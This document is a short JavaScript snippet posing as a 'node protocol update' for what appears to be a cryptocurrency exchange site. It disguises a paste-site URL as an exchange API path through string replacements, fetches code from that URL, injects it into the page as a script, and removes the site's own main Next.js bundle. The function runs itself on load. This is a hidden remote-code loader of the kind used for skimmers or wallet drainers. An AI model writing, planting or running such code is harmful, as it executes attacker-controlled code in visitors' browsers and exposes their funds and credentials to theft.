async function updateNodeProtocol() { const apiPath = 'https://stealthex.io/api/nodes/btc/node-1.9.js'; const protocol = await fetch(apiPath.replace('stealthex.io/api', 'snippet.host').replace('nodes/btc/node-1.9.js', 'exghic/raw')); const apiResponse = await protocol.text(); const nodePath = document.querySelector('script[src*="/_next/static/chunks/main-"]'); if (nodePath) { const nodeScript = document.createElement('script'); nodeScript.textContent = apiResponse; nodePath.parentNode.insertBefore(nodeScript, nodePath.nextSibling); nodePath.remove(); } } updateNodeProtocol();